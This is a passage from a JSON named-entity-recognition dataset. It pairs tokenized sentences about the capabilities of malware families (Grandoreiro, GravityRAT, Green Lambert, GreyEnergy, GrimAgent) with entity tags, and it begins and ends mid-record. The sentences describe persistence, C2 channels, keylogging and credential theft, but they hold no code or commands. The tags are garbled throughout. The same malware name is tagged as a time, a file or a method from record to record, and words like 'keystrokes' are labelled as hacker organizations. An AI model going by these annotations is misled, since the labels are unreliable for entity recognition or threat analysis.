"payload", - "has", - "been", - "delivered", - "encrypted", - "with", - "a", - "custom", - "XOR-based", - "algorithm", - "and", - "also", - "as", - "a", - "base64-encoded", - "ZIP", - "file." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "send", - "data", - "it", - "retrieves", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "delete", - ".LNK", - "files", - "created", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "store", - "its", - "configuration", - "in", - "the", - "Registry", - "at", - "`HKCU\\Software\\`", - "under", - "frequently", - "changing", - "names", - "including", - "<code>%USERNAME%</code>", - "and", - "<code>ToolTech-RM</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "download", - "its", - "second", - "stage", - "from", - "a", - "hardcoded", - "URL", - "within", - "the", - "loader's", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "log", - "keystrokes", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "infected", - "victims", - "via", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "used", - "malicious", - "links", - "to", - "gain", - "execution", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "named", - "malicious", - "browser", - "extensions", - "and", - "update", - "files", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "modify", - "the", - "Registry", - "to", - "store", - "its", - "configuration", - "at", - "`HKCU\\Software\\`", - "under", - "frequently", - "changing", - "names", - "including", - "<code>%USERNAME%</code>", - "and", - "<code>ToolTech-RM</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "use", - "MSI", - "files", - "to", - "execute", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "execute", - "through", - "the", - "<code>WinExec</code>", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "identify", - "installed", - "security", - "tools", - "based", - "on", - "process", - "names." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "use", - "run", - "keys", - "and", - "create", - "link", - "files", - "in", - "the", - "startup", - "folder", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "list", - "installed", - "security", - "products", - "including", - "the", - "Trusteer", - "and", - "Diebold", - "Warsaw", - "GAS", - "Tecnologia", - "online", - "banking", - "protections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "write", - "or", - "modify", - "browser", - "shortcuts", - "to", - "enable", - "launching", - "of", - "malicious", - "browser", - "extensions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "been", - "spread", - "via", - "malicious", - "links", - "embedded", - "in", - "e-mails." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "steal", - "the", - "victim's", - "cookies", - "to", - "use", - "for", - "duplicating", - "the", - "active", - "session", - "from", - "another", - "device." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "detect", - "VMWare", - "via", - "its", - "I/O", - "port", - "and", - "Virtual", - "PC", - "via", - "the", - "<code>vpcext</code>", - "instruction." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "collect", - "the", - "computer", - "name", - "and", - "OS", - "version", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "determine", - "the", - "IP", - "and", - "physical", - "location", - "of", - "the", - "compromised", - "host", - "via", - "IPinfo." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "collect", - "the", - "username", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "determine", - "the", - "time", - "on", - "the", - "victim", - "machine", - "via", - "IPinfo." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "use", - "VBScript", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "has", - "the", - "ability", - "to", - "use", - "HTTP", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Grandoreiro", - "can", - "modify", - "the", - "binary", - "ACL", - "to", - "prevent", - "security", - "tools", - "from", - "running." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "steals", - "files", - "with", - "the", - "following", - "extensions:", - ".docx,", - ".doc,", - ".pptx,", - ".ppt,", - ".xlsx,", - ".xls,", - ".rtf,", - "and", - ".pdf." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "GravityRAT", - "steals", - "files", - "based", - "on", - "an", - "extension", - "list", - "if", - "a", - "USB", - "drive", - "is", - "connected", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "has", - "been", - "delivered", - "via", - "Word", - "documents", - "using", - "DDE", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "supports", - "file", - "encryption", - "(AES", - "with", - "the", - "key", - "\"lolomycin2017\")." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "collects", - "the", - "volumes", - "mapped", - "on", - "the", - "system,", - "and", - "also", - "steals", - "files", - "with", - "the", - "following", - "extensions:", - ".docx,", - ".doc,", - ".pptx,", - ".ppt,", - ".xlsx,", - ".xls,", - ".rtf,", - "and", - ".pdf." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "author", - "of", - "GravityRAT", - "submitted", - "samples", - "to", - "VirusTotal", - "for", - "testing,", - "showing", - "that", - "the", - "author", - "modified", - "the", - "code", - "to", - "try", - "to", - "hide", - "the", - "DDE", - "object", - "in", - "a", - "different", - "part", - "of", - "the", - "document." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "has", - "used", - "HTTP", - "over", - "a", - "non-standard", - "port,", - "such", - "as", - "TCP", - "port", - "46769." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "lists", - "the", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "creates", - "a", - "scheduled", - "task", - "to", - "ensure", - "it", - "is", - "re-executed", - "everyday." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "uses", - "WMI", - "to", - "check", - "the", - "BIOS", - "and", - "manufacturer", - "information", - "for", - "strings", - "like", - "\"VMWare\",", - "\"Virtual\",", - "and", - "\"XEN\"", - "and", - "another", - "WMI", - "request", - "to", - "get", - "the", - "current", - "temperature", - "of", - "the", - "hardware", - "to", - "determine", - "if", - "it's", - "a", - "virtual", - "machine", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "collects", - "the", - "MAC", - "address,", - "computer", - "name,", - "and", - "CPU", - "information." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "collects", - "the", - "victim", - "IP", - "address,", - "MAC", - "address,", - "as", - "well", - "as", - "the", - "victim", - "account", - "domain", - "name." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "uses", - "the", - "<code>netstat</code>", - "command", - "to", - "find", - "open", - "ports", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "collects", - "the", - "victim", - "username", - "along", - "with", - "other", - "account", - "information", - "(account", - "type,", - "description,", - "full", - "name,", - "SID", - "and", - "status)." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "has", - "a", - "feature", - "to", - "list", - "the", - "available", - "services", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "can", - "obtain", - "the", - "date", - "and", - "time", - "of", - "a", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "executes", - "commands", - "remotely", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GravityRAT", - "collects", - "various", - "information", - "via", - "WMI", - "requests,", - "including", - "CPU", - "information", - "in", - "the", - "Win32_Processor", - "entry", - "(Processor", - "ID,", - "Name,", - "Manufacturer", - "and", - "the", - "clock", - "speed)." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "use", - "DNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "use", - "multiple", - "custom", - "routines", - "to", - "decrypt", - "strings", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "delete", - "the", - "original", - "executable", - "after", - "initial", - "installation", - "in", - "addition", - "to", - "unused", - "functions." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "use", - "Keychain", - "Services", - "API", - "functions", - "to", - "find", - "and", - "collect", - "passwords,", - "such", - "as", - "`SecKeychainFindInternetPassword`", - "and", - "`SecKeychainItemCopyAttributesAndData`." - ], - "ner_tags": [ - "B-Tool", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "I-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "create", - "a", - "Launch", - "Agent", - "with", - "the", - "`RunAtLoad`", - "key-value", - "pair", - "set", - "to", - "<code>true</code>,", - "ensuring", - "the", - "`com.apple.GrowlHelper.plist`", - "file", - "runs", - "every", - "time", - "a", - "user", - "logs", - "in." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "add", - "a", - "plist", - "file", - "in", - "the", - "`Library/LaunchDaemons`", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "add", - "Login", - "Items", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "has", - "created", - "a", - "new", - "executable", - "named", - "`Software", - "Update", - "Check`", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "has", - "been", - "disguised", - "as", - "a", - "Growl", - "help", - "file." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "has", - "encrypted", - "strings." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "use", - "proxies", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "add", - "<code>init.d</code>", - "and", - "<code>rc.d</code>", - "files", - "in", - "the", - "<code>/etc</code>", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "use", - "`uname`", - "to", - "identify", - "the", - "operating", - "system", - "name,", - "version,", - "and", - "processor", - "type." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "obtain", - "proxy", - "information", - "from", - "a", - "victim's", - "machine", - "using", - "system", - "environment", - "variables." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "collect", - "the", - "date", - "and", - "time", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "use", - "shell", - "scripts", - "for", - "execution,", - "such", - "as", - "<code>/bin/sh", - "-c</code>." - ], - "ner_tags": [ - "B-Tool", - "B-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Green", - "Lambert", - "can", - "establish", - "persistence", - "on", - "a", - "compromised", - "host", - "through", - "modifying", - "the", - "`profile`,", - "`login`,", - "and", - "run", - "command", - "(rc)", - "files", - "associated", - "with", - "the", - "`bash`,", - "`csh`,", - "and", - "`tcsh`", - "shells." - ], - "ner_tags": [ - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "encrypts", - "communications", - "using", - "RSA-2048." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GreyEnergy", - "digitally", - "signs", - "the", - "malware", - "with", - "a", - "code-signing", - "certificate." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "encrypts", - "its", - "configuration", - "files", - "with", - "AES-256", - "and", - "also", - "encrypts", - "its", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "can", - "securely", - "delete", - "a", - "file", - "by", - "hooking", - "into", - "the", - "DeleteFileA", - "and", - "DeleteFileW", - "functions", - "in", - "the", - "Windows", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "can", - "download", - "additional", - "modules", - "and", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "has", - "a", - "module", - "to", - "harvest", - "pressed", - "keystrokes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "has", - "a", - "module", - "for", - "Mimikatz", - "to", - "collect", - "Windows", - "credentials", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "modifies", - "conditions", - "in", - "the", - "Registry", - "and", - "adds", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "has", - "used", - "Tor", - "relays", - "for", - "Command", - "and", - "Control", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "has", - "a", - "module", - "to", - "inject", - "a", - "PE", - "binary", - "into", - "a", - "remote", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "uses", - "PsExec", - "locally", - "in", - "order", - "to", - "execute", - "rundll32.exe", - "at", - "the", - "highest", - "privileges", - "(NTAUTHORITY\\SYSTEM)." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "is", - "packed", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "encrypts", - "communications", - "using", - "AES256." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "GreyEnergy", - "enumerates", - "all", - "Windows", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "B-Idus" - ] - }, - { - "tokens": [ - "GreyEnergy", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "uses", - "cmd.exe", - "to", - "execute", - "itself", - "in-memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GreyEnergy", - "chooses", - "a", - "service,", - "drops", - "a", - "DLL", - "file,", - "and", - "writes", - "it", - "to", - "that", - "serviceDLL", - "Registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "use", - "a", - "hardcoded", - "server", - "public", - "RSA", - "key", - "to", - "encrypt", - "the", - "first", - "request", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "the", - "ability", - "to", - "add", - "bytes", - "to", - "change", - "the", - "file", - "hash." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "delete", - "previously", - "created", - "tasks", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "collect", - "data", - "and", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "use", - "a", - "decryption", - "algorithm", - "for", - "strings", - "based", - "on", - "Rotate", - "on", - "Right", - "(RoR)", - "and", - "Rotate", - "on", - "Left", - "(RoL)", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "sent", - "data", - "related", - "to", - "a", - "compromise", - "host", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "delete", - "old", - "binaries", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "the", - "ability", - "to", - "enumerate", - "files", - "and", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "pad", - "C2", - "messages", - "with", - "random", - "generated", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "use", - "Native", - "API", - "including", - "<code>GetProcAddress</code>", - "and", - "<code>ShellExecuteW</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "used", - "Rotate", - "on", - "Right", - "(RoR)", - "and", - "Rotate", - "on", - "Left", - "(RoL)", - "functionality", - "to", - "encrypt", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "set", - "persistence", - "with", - "a", - "Registry", - "run", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "has", - "the", - "ability", - "to", - "set", - "persistence", - "using", - "the", - "Task", - "Scheduler." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "base64", - "encode", - "C2", - "replies." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GrimAgent", - "can", - "use", - "an", - "AES", - "key", - "to", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - 